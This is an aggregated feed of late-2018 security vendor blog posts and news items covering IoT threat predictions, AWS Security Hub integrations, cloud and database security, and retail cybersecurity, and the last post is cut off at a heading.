For now, the voice assistant market is still taking shape, with many brands still looking to dominate the market, in more ways than one, and it is unclear whether one device will become ubiquitous. If one does take the lead, its security features will quite rightly fall under the microscope of the media, though not perhaps before its privacy concerns have been fully examined in prose.
(Last year we highlighted privacy as the key concern for home IoT devices. Privacy will continue to be a concern, but cybercriminals will put more effort into building botnets, demanding ransoms, and threatening the destruction of property of both homes and businesses).
This opportunity to control a home’s or office’s devices will not go unnoticed by cybercriminals, who will engage in an altogether different type of writing in relation to the market winner, in the form of malicious code designed to attack not only IoT devices but also the digital assistants that are given so much license to talk to them.
Smartphones have already served as the door to a threat. In 2019, they may well become the picklock that opens a much larger door. We have already seen two threats that demonstrate what cybercriminals can do with unprotected devices, in the form of the Mirai botnet, which first struck in 2016, and IoT Reaper, in 2017. These IoT malware appeared in many variants to attack connected devices such as routers, network video recorders, and IP cameras. They expanded their reach by password cracking and exploiting known vulnerabilities to build worldwide robot networks.
Next year we expect to see two main vectors for attacking home IoT devices: routers and smartphones/ tablets. The Mirai botnet demonstrated the lack of security in routers. Infected smartphones, which can already monitor and control home devices, will become one of the top targets of cybercriminals, who will employ current and new techniques to take control.
Malware authors will take advantage of phones and tablets, those already trusted controllers, to try to take over IoT devices by password cracking and exploiting vulnerabilities. These attacks will not appear suspicious because the network traffic comes from a trusted device. The success rate of attacks will increase, and the attack routes will be difficult to identify. An infected smartphone could cause the next example of hijacking the DNS settings on a router. Vulnerabilities in mobile and cloud apps are also ripe for exploitation, with smartphones at the core of the criminals’ strategy.
Infected IoT devices will supply botnets, which can launch DDoS attacks, as well as steal personal data. The more sophisticated IoT malware will exploit voice-controlled digital assistants to hide its suspicious activities from users and home-network security software. Malicious activities such as opening doors and connecting to control servers could be triggered by user voice commands (“Play music” and “What is today’s weather?”). Soon we may hear infected IoT devices themselves exclaiming: “Assistant! Open the back door!”
Cybercriminals to Increase Attacks on Identity Platforms and Edge Devices Under Siege
Large-scale data breaches of identity platforms—which offer centralized secure authentication and authorization of users, devices, and services across IT environments—have been well documented in 2018. Meanwhile, the captured data is being reused to cause further misery for its victims. In 2019, we expect to see large-scale social media platforms implement additional measures to protect customer information. However, as the platforms grow in numbers, we predict criminals will further focus their resources on such attractive, data-rich environments. The struggle between criminals and big-scale platforms will be the next big battleground.
Triton, malware that attacks industrial control systems (ICS), has demonstrated the capabilities of adversaries to remotely target manufacturing environments through their adjacent IT environments. Identity platform and “edge device” breaches will provide the keys to adversaries to launch future remote ICS attacks due to static password use across environments and constrained edge devices, which lack secure system requirements due to design limitations. (An edge device is any network-enabled system hardware or protocol within an IoT product.) We expect multifactor authentication and identity intelligence will become the best methods to provide security in this escalating battle. We also predict identity intelligence will complement multifactor authentication to strengthen the capabilities of identity platforms.
Identity is a fundamental component in securing IoT. In these ecosystems, devices and services must securely identify trusted devices so that they can ignore the rest. The identity model has shifted from user centric in traditional IT systems to machine centric for IoT systems. Unfortunately, due to the integration of operational technology and insecure “edge device” design, the IoT trust model is built on a weak foundation of assumed trust and perimeter-based security.
At Black Hat USA and DEF CON 2018, 30 talks discussed IoT edge device exploitation. That’s a large increase from just 19 talks on the topic in 2017. The increase in interest was primarily in relation to ICS, consumer, medical, and “smart city” verticals. (See Figure 1.) Smart edge devices, combined with high-speed connectivity, are enabling IoT ecosystems, but the rate at which they are advancing is compromising the security of these systems.
Figure 1: The number of conference sessions on the security of IoT devices has increased, matching the growing threat to poorly protected devices.
Most IoT edge devices provide no self-defense (isolating critical functions, memory protection, firmware protection, least privileges, or security by default) so one successful exploit owns the device. IoT edge devices also suffer from “break once, run everywhere” attacks—due to insecure components used across many device types and verticals. (See articles on WingOS and reverse engineering.)
McAfee Advanced Threat Research team engineers have demonstrated how medical device protocols can be exploited to endanger human life and compromise patients’ privacy due to assumed trust. These examples illustrate just a few of many possible scenarios that lead us to believe adversaries will choose IoT edge devices as the path of least resistance to achieve their objectives. Servers have been hardened over the last decade, but IoT hardware is far behind. By understanding an adversary’s motives and opportunities (attack surface and access capability), we can define a set of security requirements independent of a specific attack vector.
Figure 2 gives a breakdown of the types of vulnerabilities in IoT edge devices, highlighting weak points to address by building identity and integrity capabilities into edge hardware to ensure these devices can deflect attacks.
Figure 2: Insecure protocols are the primary attack surface in IoT edge devices.
IoT security must begin on the edge with a zero-trust model and provide a hardware root of trust as the core building block for protecting against hack and shack attacks and other threats. McAfee predicts an increase in compromises on identity platforms and IoT edge devices in 2019 due to the adoption of smart cities and increased ICS activity.
Amazon Web Services on Wednesday announced the launch of AWS Security Hub, a service designed to aggregate and prioritize alerts from AWS and third-party security tools.
This article explains how Imperva application security integrates with AWS Security Hub to give customers better visibility and feedback on the security status of their AWS hosted applications.
Securing AWS Applications
Cost reduction, simplified operations, and other benefits are driving organizations to move more and more applications onto AWS delivery platforms; because all of the infrastructure maintenance is taken care of by AWS. As with migration to a cloud service, however, it’s important to remember that cloud vendors generally implement their services in a Shared Security Responsibility Model. AWS explains this in a whitepaper available here.
Imperva solutions help diverse enterprise organizations maintain consistent protection across all applications in their IT domain (including AWS) by combining multiple defenses against Application Layer 3-4 and 7 Distributed Denial of Service (DDoS) attacks, OWASP top 10 application security risks, and even zero-day attacks. Imperva application security is a top-rated solution by both Gartner and Forrester for both WAF and DDoS protection.
Visibility Leads to Better Outcomes
WAF security is further enhanced through Imperva Attack Analytics, which uses machine learning technology to correlate millions of security events across Imperva WAFs assets and group them into a small number of prioritized incidents, making security teams more effective by giving them clear and actionable insights.
AWS Security Hub is a new web service that provides a consolidated security view across AWS Services as well as 3rd party solutions. Imperva has integrated its Attack Analytics platform with AWS Security Hub so that the security incidents Attack Analytics generates can be presented by the Security Hub Console.
Brief Description of How the Integration Works
The integration works by utilizing an interface developed for AWS Security Hub for what is essentially an “external data connector” called a Findings Provider (FP). The FP enables AWS Security Hub to ingest standardized information from Attack Analytics so that the information can be parsed, sorted and displayed. This FP is freely available to Imperva and AWS customers on Imperva’s GitHub page listed at the end of this article.
The way the data flows between Attack Analytics and AWS Security Hub is that Attack Analytics exports the security incidents into an AWS S3 bucket within a customer account, where the Imperva FP can make it available for upload.
To activate AWS Security Hub to use the Imperva FP, customers must configure several things described in the AWS Security Hub documentation. As part of the activation process, the FP running in the customer’s environment needs to acquire a product-import token from AWS Security Hub. Upon FP activation, the FP is authorized to import findings into their AWS Security Hub account in the AFF format, which will happen at configurable time intervals.
It’s critically important that organizations maintain robust application security controls as they build or migrate applications to AWS architectures. Imperva helps organizations ensure every application instance can be protected against both known and zero-day threats, and through integration with AWS Security Hub, Imperva Attack Analytics can ensure organizations always have the most current and most accurate status of their enterprise application security posture.
Security Hub is initially being made available as a public preview. We are currently looking for existing Attack Analytics customers that are interested in working with us to refine our integration. If you’re interested in working with us on this please get in touch. Once SecurityHub becomes generally available we intend to release our Security Hub integration as an open source project on Imperva’s GitHub account.
The post Imperva Integration With AWS Security Hub: Expanding Customer Security Visibility appeared first on Blog.
One of the biggest challenges in maintaining your security posture is visibility. You have security controls deployed throughout the stack, and each fo these tools is generating its own set of data points and has its own view of your deployment.
Managing the multitude of alerts and events from these tools can quickly get overwhelming. Enter AWS Security Hub.
Announced at AWS re:Invent 2018, this service is available to all aws users as a public preview. Trend Micro is product to be a supporting launch partner by allowing customers to send high value findings from Deep Security to this exciting new service.
What is AWS Security Hub?
AWS Security Hub provides a comprehensive view of your high priority security alerts and compliance status for your AWS deployment. By combining data from Amazon GuardDuty, Amazon Inspector, and Amazon Macie along with a host of APN partner solutions, the AWS Security Hub is a one-stop shop for security visibility.
Each data source provides various findings relevant to the tool. Amazon Macie will send findings related to data within Amazon S3 buckets it monitors, Amazon GuardDuty will provide findings based on the assessments it runs on your Amazon EC2 Instances, and so forth.
This not only helps you gain visibility and respond to incidents but also helps you monitor ongoing compliance requirements with automated checks against the Center for Internet Security (CIS) AWS Foundations Benchmark.
AWS Security Hub not only brings together this information across your AWS accounts but it prioritizes these findings to help you spot trends, identify potential issues, and take the relevant steps to protect your AWS deployments.
You can read more about AWS Security Hub on the AWS blog.
Instance Security Data
Trend Micro’s Deep Security offers a host of security controls to protect your Amazon EC2 instances and Amazon ECS hosts, helping you to fulfill your responsibilities under the shared responsibility model.
By providing technical controls like intrusion prevention, anti-malware, application control, and others, Deep Security lets you roll out one security tool to address all of your security and compliance requirements.
Read more about the specifics of Deep Security deployed in AWS on the Trend Micro AWS microsite.
As it sits protecting the instance, Deep Security generates a lot of useful security information for compliance, incident response, and forensics. With the integration with AWS Security Hub, high priority information generated by Deep Security will be sent to the service in order to centralize and simplify the view of your deployment’s security across multiple AWS services and APN solutions.
This complements the suite of existing AWS security services and existing Deep Security integrations with AWS WAF, Amazon GuardDuty, Amazon Macie, and Amazon Inspector helping to bring together all of your critical AWS security data in one, simple to use service.
The Deep Security integration with the AWS Security Hub is available today on GitHub. This simple integration runs as an AWS Lambda function in your account, sending high priority security events to the new service.
Get started today in just a few minutes with a few easy steps!
The post AWS Security Hub and Deep Security appeared first on .
For years, cybersecurity professionals across the globe have been highly alarmed by threats appearing in the form of malware, including Trojans, viruses, worms, and spear phishing attacks. And this year was no different. 2018 witnessed its fair share of attacks, including some new trends: credential theft emerged as a major concern, and although ransomware remains […]
The post Evolving Cyberthreats: It’s Time to Enhance Your IT Security Mechanisms appeared first on Radware Blog.
Threat prevention provider Cylance this week announced support for Amazon Web Services (AWS) in its CylancePROTECT threat prevention solution.
Microsoft has provided information on the root cause of the massive outage that last week impacted its Azure Active Directory authentication services across Europe, Asia, and the Americas.
Orkus on Monday emerged from stealth mode with a cloud security platform designed to help organizations secure access to data, apps and infrastructure.
How businesses are building firewalls is changing. We’re seeing a continued trend toward smaller firewall boundaries and micro-segmentation to support zero-trust strategies, although it can be very piecemeal. As businesses
The post Managing Firewalls in the Cloud: do Companies Know Enough About Security Intent? appeared first on The Cyber Security Place.
There’s rarely a time in the day when Andi Hudson isn’t immersed in technology. When he’s not fulfilling his duties as IBM’s cloud security architecture lead in the U.K., he’s reaching out to the next generation of cyber professionals through volunteer work with universities and colleges. Or, he’s teaching his own young kids how to write in Python, or how to make wacky contraptions, such as an automated irrigation kit and a Tesla coil that plays music.
Simply put, Andi Hudson lives and breathes tech and security, and he’s always happy to chat about anything from cloud security, to artificial intelligence (AI), to the impact of the Internet of Things (IoT) to the neuroscience of privacy denial.
“For me, cybersecurity has to start right at the very beginning,” he said, speaking from his home in South Wales. “Giving kids access to this stuff is important, but even more important is teaching them to use it ethically and responsibly.”
Spreading the Gospel of Data Privacy
No matter what else he’s doing, Andi is always keeping a close eye on the future. He’s particularly interested in artificial intelligence, data privacy and what the C-suite needs to pay more attention to.
Much of it comes down to the data, which Andi classified as “the oil of tomorrow.” He believes that, given the right bits of information, cybercriminals can steal data (including identities) and “really go to town with this information.” He’s also worried about the confirmation bias this level of sharing brings — that our “likes” are collected and we’re grouped with other users who share the same ideas opinions. To quote Andi, quoting author Cory Doctorow: “It’s not about what you have to hide; it’s about what you choose to share.”
“We give away so much information so freely, to a degree I think the horse has already bolted,” he said. “That’s why I invest so much of my own time in educating academia, because they’re the next generation. But it doesn’t just start at universities and colleges; it starts at home in the family, and in primary school and secondary school. Security is not a product — it’s a process.”
Andi is a science, technology, engineering and mathematics (STEM) ambassador, as well as a Barefoot volunteer with Computing at School (CAS). He visits primary schools to nurture the next generation of cyber professionals. Andi shows the faculty how to teach computational science, helps children understand the importance of STEM subjects and exposes them to careers in technology.
A Nontraditional Approach to Cloud Security
When he’s not nurturing the youth, Andi leads a growing team of architects at IBM Security U.K. Part of his role is to ensure that all the individual skill sets in security keep cloud-based applications front of mind. IBM promoted him to lead after catching wind of the impressive work he did in the London insurance market, building collaborative cross-vendor solutions for a new target operating model that enables 9,000 U.K. financial services companies to work together.
“IBM never really had a cloud team that encompassed a lot of those different skill sets,” he said. “A lot of the traditional architecture always sat in resource pools within somebody else’s data center — but, of course, with the cloud, that’s all different now. They’re not using their own data centers anymore; they’re using ours.”
While Andi primarily works hands-on with clients on cloud-related transformation projects, he also gets to speak at conferences and, of course, engage with the education sector in both his day job and his volunteer work.
A member of the South Wales Cyber Security Cluster, Andi works with Cardiff’s three universities to make courses as relevant as possible according to the latest industry trends. That plays into the work IBM does with Exeter University, and may soon start doing with Warwick University and the University of the West of England.
“It’s about making a difference,” he said before launching into a story from last year when, at the height of the Petya and WannaCry ransomware outbreaks, he found himself in a war room on a weekend trying to reverse-engineer a client out of an attack.
“You know when you feel sick in your stomach, the nerves and anxiety? I’ve had it before when I used to work for a services company; we switched the system off once and it didn’t come back on,” he recalled. “You have this gut-sickness feeling. You’ve just done a lot of work, you’ve had no sleep, and you know you won’t get any sleep or food until this problem’s gone. It was exactly like that — that sick feeling.”
Why Security Leaders Need to Tell It Like It Is
Luckily, Andi was so close to the customer and had been so hands-on with the account that he was able to solve the problem and develop a watertight remediation plan. He even won an award for his work.
The key, he said, is his willingness to have frank discussions about security, even if it means telling clients what they don’t want to hear. Andi has found that this nontraditional approach helps him develop closer relationships with clients and break conversational barriers that would otherwise stymie progress.
“I think that clear, open transparency just resonates with customers,” he emphasized. “A lot of things were always taboo — certain things you didn’t say to certain executives, and certain things you didn’t cover — but if you want a real, secure solution, unfortunately you have to have those conversations.”
This transparency is especially crucial today, given the lightning-quick pace of change in the industry and ever-evolving nature of the cyberthreat landscape.
“The fact is, it keeps changing — and what’s right today might not be right tomorrow.”
That’s why Andi always has his eyes on tomorrow — both in terms of the threats his clients will have to contend with and the next generation of cybersecurity heroes that will defend them.
The post How Cloud Security Architect Andi Hudson Nurtures Today’s Youth to Protect Tomorrow’s Data appeared first on Security Intelligence.
Cybersecurity is still the big one. But interoperability and telehealth are not far behind for leading organizations’ technology goals. The Center for Connected Medicine polled IT executives across 38 health
The post Center for Connected Medicine Polls Top Health Systems About 2019 Priorities appeared first on The Cyber Security Place.
Digital transformation is dominating retailers’ attention — and their IT budgets. As a result, significant gaps in retail cybersecurity are left unfilled just as retail IT faces new challenges, from infrastructure moving to the cloud without clear security policies to an array of new threat vectors focused on personal customer information, ransomware and underprotected business-to-business (B2B) connections.
Just as with line-of-business functions like merchandising and operations, retailers’ cybersecurity functions must undergo a digital transformation to become more holistic, proactive and nimble when protecting their businesses, partners and customers.
Retailers Aren’t Prioritizing Security, and Attackers Are Exploiting the Gaps
According to the retail edition of the “2018 Thales Data Threat Report,” 75 percent of retailers have experienced at least one data breach in the past, with half seeing a breach in the past year alone. That puts retail among the most-attacked industries as ranked by the “2018 IBM X-Force Threat Intelligence Index.”
Underfunded security infrastructure is likely a big reason for this trend; organizations only dedicated an average of around 5 percent of their overall IT budgets to security and risk management, according to a 2016 Gartner report.
While retailers have done a great job addressing payment card industry (PCI) compliance, it has come at a cost to other areas. According to IBM X-Force Incident Response and Intelligence Services (IRIS) research, 78 percent of publicly disclosed point-of-sale (POS) malware breaches in 2017 occurred in the retail sector.
In addition to traditional POS attacks, malicious actors are targeting retailers with new threat vectors that deliver more bang for the buck, such as the following:
- Personally identifiable information (PII) about customers — Accessible via retailers’ B2C portals, attackers use this information in bot networks to create false IDs and make fraudulent transactions. An increasingly popular approach involves making purchases with gift cards acquired via fraud.
- Ransomware — Criminals are exploiting poorly configured apps and susceptible end users to access and lock up data, so they can then extract pricey ransoms from targeted retailers.
- Unprotected B2B vendor connections — Threat actors can gain access to retail systems by way of digital connections to their partners. A growing target is a retailer’s B2B portals that have been constructed without sufficient security standards.
What Are the Biggest Flaws in Retail Cybersecurity?
These new types of attacks take advantage of retailers’ persistent underfunding of critical security defenses. Common gaps include inadequate vulnerability scanning capabilities, unsegmented and poorly designed networks, and using custom apps on legacy systems without compensating controls. When retailers do experience a breach, they tend to address the specific cause instead of taking a more holistic look at their environments.
Retailers also struggle to attract security talent, competing with financial services and other deeper-pocketed employers. The National Institute of Standards and Technology (NIST) reported in 2017 that the global cybersecurity workforce shortage is expected to reach 1.5 million by 2019.
In addition, flaws in governance make retailers more vulnerable to these new types of security threats. To keep up with rapidly evolving consumer demands, many line-of-business departments are adopting cloud and software-as-a-service (SaaS) solutions — but they often do so without any standardized security guidance from IT.
According to the “2017 Thales Data Threat Report,” the majority of U.S. retail organizations planned to use sensitive data in an advanced technology environment such as cloud, big data, Internet of Things (IoT) or containers this year. More than half believed that sensitive data use was happening at the time in these environments without proper security in place. Furthermore, companies undergoing cloud migration at the time of a breach incur $12 per record in additional costs, according to the “2018 Cost of a Data Breach Study.”
To protect their data, retailers need tools to both identify security threats and escalate the response back through their entire infrastructure, including SaaS and cloud services. But many enterprises lack that response capability. What’s more, the “Cost of a Data Breach Study” found that using an incident response (IR) team can reduce the cost of a breach by around $14 per compromised record.
Unfortunately, cybersecurity is not always on the radar in retailers’ C-suites. Without a regularly updated cybersecurity scorecard that reflects an organization’s current vulnerability to attack, senior executives might not regularly discuss the topic, take part in system testing or see cybersecurity as part of business continuity.
3 Steps to Close the Gaps in Your Security Stance
Time isn’t stopping as retailers grapple with these threats. Retail cybersecurity leaders must also monitor the General Data Protection Regulation (GDPR), where compliance requirements are sometimes poorly understood, as well as the emergence of artificial intelligence (AI) in both spoofing and security response. In addition, retailers should keep an eye on the continued uncertainty about the vulnerability of platform-as-a-service (PaaS), microservices, cloud-native apps and other emerging technologies.
By addressing the gaps in their infrastructure, governance and staffing, retailers can more effectively navigate known threats and those that will inevitably emerge. Change is never easy, but the following three steps can help retailers initiate digital transformation and evolve their current approach to better suit today’s conditions:
1. Increase Budgets
According to Thales, 84 percent of U.S. retailers plan to increase their security spending. While allocating these additional funds, it’s important for retailers to take a more holistic view, matching budgets to areas of the highest need. Understanding the costs and benefits of addressing security gaps internally or through outsourcing is a key part of this analysis.
2. Improve Governance
Enacting consistent security guidelines across internally run systems as well as cloud- and SaaS-based services can help retailers ensure that they do not inadvertently open up new vulnerabilities in their platforms. Senior-level endorsement is an important ingredient in prioritizing cybersecurity across the enterprise. Regular security scorecarding can be a valuable tool to keep cybersecurity at the top of executives’ minds.
3. Invest in MSS
A growing number of retailers have realized that starting or increasing their use of managed security services (MSS) can help them achieve a higher level of security maturity at the same price as managing activities in-house, if not at a lower cost. MSS allow retailers’ internal cybersecurity to operate more efficiently, address critical talent shortages and enable retailers to close critical gaps in their current security stance.
Why Digital Transformation Is Critical to Rapid Response
Digital transformation is all about becoming more proactive and nimble to respond to consumers’ rapidly growing expectations for seamless, frictionless shopping. Retailers’ cybersecurity efforts require a similar, large-scale transition to cope with new threat vectors, close significant infrastructure gaps and extend security protocols across new platforms, such as cloud and SaaS. By rethinking their budgets, boosting governance and incorporating MSS into their security operations, retail security professionals can support digital transformation while ensuring the business and customer data remains protected and secure.
Hardly a week goes by that we don’t hear about an organization leaving sensitive data exposed on the Internet because they failed to properly configure their Amazon S3 buckets. Amazon Web Services, to their credit, are trying to prevent this from happening. For one, all newly created S3 buckets and objects (files and directories in the bucket) are by default private, i.e. not publicly accesible by random people via the Internet. Secondly, changes implemented earlier … More
The post New security feature to prevent Amazon S3 bucket misconfiguration and data leaks appeared first on Help Net Security.
By Roberto Mircoli, CTO EMEA at Virtustream, Government and public sector organisations continue to seek ways to improve services and mitigate the risk of migrating mission-critical applications to the cloud.
Amazon announced this week that a new feature designed to prevent data leaks has been added to Amazon Web Services (AWS).
Helping our customers reduce the risks associated with migrating to the cloud, and preventing availability and security incidents, has been a major development focus for Imperva over the last several years.
Why the partnership matters
Although cloud service providers take a host of IT management burdens off of your shoulders when using their platforms, service level agreements (SLA) for platform availability and security don’t cover what runs on the platform. While they protect the platform itself, they are very clear that management, compliance and security responsibilities for your applications and data are yours alone. Amazon calls this a Shared Responsibility Model.
What we do
For applications, Imperva helps customers ensure that they don’t suffer from Application Layer 3-4 and 7 Distributed Denial of Service (DDoS) attacks and protects against all OWASP top 10 application security risks and even zero-day attacks. Imperva application security is a top-rated solution by both Gartner and Forrester for both WAF and DDoS protection.
Additionally, for cloud database migrations, Imperva helps ensure customers don’t leave gaps in their compliance and security controls as they migrate their database to the AWS EC2 Infrastructure as a Service (IaaS) platform. As of December 2017, we also cover Platform as a Service (PaaS) offerings such as Amazon RDS.
Most organizations operate hybrid IT environments, hosting some applications and data in on-premises data centers, and some on public cloud platforms – or multiple vendor cloud platforms. Imperva supports these configurations and provides solutions to integrate security into Continuous Integration and Continuous Deployment (CI/CD) processes used by DevOps project teams.
Imperva recently acquired the Prevoty Runtime Application Self Protection (RASP) solution; so our customers can automate security deployment in DevOps project delivery processes, to ensure applications and data are always protected.
Stop by the Imperva booth at re:Invent 2019 and get a personal update on our solutions for AWS, and don’t miss our subject matter expert, Peter Klimek, speak about strategies for a proactive and preventative security approach in session: “DEM44: Security Challenges in a DevOps World in the Expo Pilvi Theatre.
The post Imperva and Amazon Partner to Help Mitigate Risks Associated With Cloud Migration appeared first on Blog.
Organizations Need the Right Technologies and Talent in Place to Ensure a Secure Transition to the Cloud
If we asked database administrators, security teams, and risk teams about their definition of what database security is, the answers would vary widely.
Each team views the definition based on their own requirements, but the one answer that most likely won’t appear is: “To protect data.”
Traditionally, database security has always been seen as a means to protect the database systems from vulnerabilities, missing patches, simple misconfigurations, or SQL injections. While this certainly holds true in today’s environments too, we cannot ignore the fact that requirements for securing a company’s most valuable asset—its data—have changed.
Adding data to database security
With the increase in regulatory compliance requirements such as PCI-DSS, HIPAA, SOX, and GDPR, enterprises are asking more and more from their data protection solutions. Data is seen as the new oil—a way to fuel companies. Protecting data must be at the core of every strategy. Where better to start than the one place most data resides, the database?
Database security solutions in today’s data- and compliance-driven environments must not only allow companies to measure the level of security of their databases but must provide the ability to locate personal identifiable data, business critical data, and any other data that is of value to the organization.
In addition, any data that is discovered must be monitored, in real time, 24/7. Long gone are the days when audit logs were sufficient or simple network monitoring was considered adequate. Data is the world’s greatest asset and companies must invest in protecting their own data as well as their customers’ data.
As-a-service: a world of shared responsibilities
Database(s)-as-a-service is one of the fastest growing markets within the world of cloud. It provides organizations with unparalleled amounts of scalability and compute power while at the same time removing many of the challenges that we would see as traditionally related to database security (vulnerability and patch management, for example). In the shared responsibility world of the cloud, the one constant is data. Customers are always responsible for protecting and monitoring their data.
Too many data breaches are successful because the exfiltration of data was made possible by either very little or no real-time monitoring of the data. Traditional database security is not designed to protect data, it’s designed to protect the database from malicious SQL injections or vulnerabilities. One might argue that is data protection. But in reality, database security in today’s data-driven environments must allow organizations to monitor anyone and anything that accesses the “crown jewels,” in real time, with the ability to stop unauthorized access to data.
McAfee helps fill that gap by offering software-based database security solutions that allow the monitoring of database instances across both on-premises solutions and the cloud. Non-intrusive, lightweight, and easy to deploy, McAfee database security solutions allow customers to enjoy all the benefits of moving to a hybrid cloud enterprise database environment while retaining control over security, risk, and data protection.
For more information, visit the database security product information page.
The post Why Traditional Database Security Doesn’t Protect Data appeared first on McAfee Blogs.
Report Demonstrates that Security Needs to be Included in Containerization
Enterprises using infrastructure-as-a-service (IaaS) or platform-as-a-service (PaaS) solutions have 14 misconfigured instances on average running at a given time.
A recent cloud adoption study by McAfee found that organizations have increased their usage of the cloud over time. The average number of cloud services in use per company grew from 1,682 in 2017 to 1,935 a year later. This growth was evident in both the number of enterprise cloud apps and consumer cloud apps.
But while organizations are increasingly turning to the cloud to satisfy their business needs, they aren’t taking the necessary steps to safeguard their cloud-based assets, the researchers observed. According to the report, some of the most common oversights involved inactive data encryption and unrestricted outbound access.
How Do Cloud Misconfigurations Put Data at Risk?
Cloud misconfigurations directly jeopardize organizations’ data. McAfee customers who turn on data loss prevention (DLP) discovered an average of 1,527 DLP incidents in their IaaS or PaaS storage per month. Overall, 27 percent of organizations using PaaS experienced a data theft incident affecting their cloud infrastructure.
Part of the problem is that no two cloud service providers (CSPs) offer the same security controls. Some CSPs even lack some of the most basic security measures. Just 8 percent of providers encrypted stored data at rest, for instance, while only 19.2 percent supported multifactor authentication (MFA).
How to Cope With Increasing Cloud Adoption
Security professionals can help their organizations stay protected amid increasing cloud adoption by embedding corporate security policies into contracts with CSPs. They should also consider conducting regular penetration tests to map their environments for vulnerabilities.
More than ever, customers understand their right to data privacy. As major brands continue to lose sensitive data to cybercriminals in high-profile cloud security failures, customer trust in companies across industries is fading. Only 25 percent of consumers believe most companies handle their data responsibly, according to PricewaterhouseCoopers (PwC). As a result, secure, transparent data handling practices are more imperative than ever.
New regulations signal that governing bodies are also taking the enterprise’s responsibility for data privacy very seriously. The Brazil Privacy Act and the California Consumer Privacy Act support the consumer’s right to understand how their data is collected and used, and the New York Department of Financial Services (NYDFS) requirements are among the first regulations to address cloud security risks. Proposed rules require financial institutions to conduct vulnerability assessments and practice data classification and safe data management, whether the data resides on-premises or in the cloud.
Misconfigurations Cause Database Security Mayhem
Despite increased pressure to protect customer data, security teams are still struggling to address database security risks. Misconfigured servers, networked backup incidents and other system misconfigurations resulted in the exposure of 2 billion data records in 2017, according to the “IBM X-Force Threat Intelligence Index 2018” — that’s a 424 percent increase in such data breaches over last year’s total.
Cybercriminals are innovating quickly to take advantage of enterprise cloud security challenges. Many are using and creating open source tools to scan the web for unprotected cloud storage and, in some cases, locking these systems for ransom. Results from a Threat Stack study indicated that the majority of cloud databases are unprotected or otherwise misconfigured. Researchers attributed the prevalence of misconfigurations to employee negligence and insufficient IT policies.
Why the Enterprise Cloud Is Vulnerable
Still, it would be unfair to blame the current state of enterprise cloud security on employee negligence — at least, not entirely. Critical misconfigurations are technically the result of inadvertent insider error, but the reality is a bit more complex. Correcting configurations and compliance risks is difficult because security teams lack actionable visibility into cloud risks. There’s a glut of security risk to deal with, and traditional approaches to assessing risk result in an abundance of data with little actionable intelligence.
The enterprise cloud environment is complex and difficult to capture with vulnerability assessment tools designed for physical network and endpoint risk assessments. The unstructured, NoSQL landscape of the big data on cloud evolves on a near-daily basis to accommodate new forms of unstructured data. It’s no wonder that trying to assess database security risk across heterogeneous environments is often compared to finding a needle in a haystack.
Layered vulnerability assessments are crucial to protect against cloud security and compliance risks. Under some recent regulatory requirements, in fact, vulnerability assessments are mandatory. However, the enterprise needs vulnerability solutions that can support the scale of cloud database-as-a-service (DBaaS), traditional on-premises databases, warehouses and big data environments in a meaningful way.
Advanced analytics are necessary to sort through complex event data to correlate patterns and find true outliers that are associated with meaningful risk of data loss or advanced threats. The sheer volume and variety of data in the enterprise cloud requires proactive vulnerability assessment. A vulnerability assessment solution should automate risk prioritization, recommend remediation and simplify complex compliance requirements.
How to Achieve Real-Time Security and Compliance in Cloud or Hybrid Environments
Reducing risk requires visibility and control with an adaptive, real-time approach to understanding exposure. In a database environment, assessments should actively examine privileges, authentication, configuration, versioning and patching. Finding and remediating advanced threats from insiders, ransomware and data breaches requires advanced analytics. Your vulnerability assessment solution should rank risks based on the importance of data and breach likelihood and recommend remediation actions.
Security and risk are convening in the enterprise, and vulnerability tools should deliver risk intelligence that can be shared with the chief information officer (CIO), chief security officer (CSO) and chief risk officer (CRO). Enterprise cloud environments are complex, but a vulnerability assessment tool can provide a consolidated and actionable view into risk, remediation, compliance and policy. To drive continued value, however, a vulnerability assessment solution must scale to new services as new applications, databases and cloud services are deployed over time.
The cloud has shifted the landscape and created the need for a new approach to assessing risks. If understanding compliance and configurations feels like finding needles in a haystack, it may be time to automate. Data privacy is now a compliance and customer imperative, and understanding the state of your databases is critical, so aim to scale your security assessments with a solution designed for the complexities of the enterprise cloud environment.
The post How Can Companies Move the Needle on Enterprise Cloud Security Risks and Compliance? appeared first on Security Intelligence.
The IT industry has gone through lots of changes over the past few years, yet when it comes to cybersecurity, the mindset has remained the same. The current thinking around cybersecurity falls into the definition of insanity, with many organisations doing the same thing over and over again, expecting different results, and are then shocked when their company is the latest to hit the hacking headlines.
The current security model is broken and is currently too complex. As Paul German, CEO, Certes Networks, argues, it’s time to strip network security back and focus on the data.
What should Organisations Really be Protecting?
Ultimately, by overcomplicating network security for far too long, the industry has failed - which won’t come as a surprise to many. We’ve all learned the lessons from the high profile data breaches such as Dixon’s Carphone and historical breaches like Ticketmaster or Target; what they succeeded in showing us was that current attempts to secure corporate networks are just not enough. And the reason for this? Quite simply, it’s because organisations are trying to protect something they no longer own. For a long time, security thinking has focused purely on the network, honing in on the insecurity of the network and trying to build up network defences to protect the data that runs over it in order to combat the challenges.
Yet, this way of thinking still leaves a problem untouched: we don’t always own the networks over which our data runs, so therefore focusing on this aspects is leaving many other doors wide open. The corporate network used to remain in the data centre, but in the digital economy present today, the corporate network spans over corporate locations worldwide, including data centres, private clouds and public clouds. Additionally, this data is not just shared with employees, but to third parties whose devices and policies cannot be easily controlled. Add legacy security measures into the mix which simply weren’t constructed to address the complexity and diversity of today’s corporate network, and it is extremely apparent why this is no longer enough.
So, what needs to change? First and foremost, the industry needs to take a step in the right direction and put data at the forefront of security strategies.
The Security Mindset Needs to Change - and It Needs to Change Now
In an attempt to keep their data and infrastructure secure, organisations have layered technology on top of technology. As a result of this, not only has the technology stack itself become far too complicated but the number of resources, operational overhead and cost needed to manage it have only contributed to the failing security mindset.
Anyone in the IT industry should be able to acknowledge that something needs to change. The good news is that the change is simple. Organisations need to start with a security overlay that covers the networks, independent of the infrastructure, rather than taking the conventional approach of building the strategy around the infrastructure. The network itself must become irrelevant, which will then encourage a natural simplicity in approach.
As well as enabling organisations to better secure their data, this approach also has economic and commercial benefits. Taking intelligence out of the network allows organisations to focus it on its core task: managing traffic. In turn, money and resources can be saved and then better invested in a true security model with data protection at its heart.
A New Era of Cybersecurity
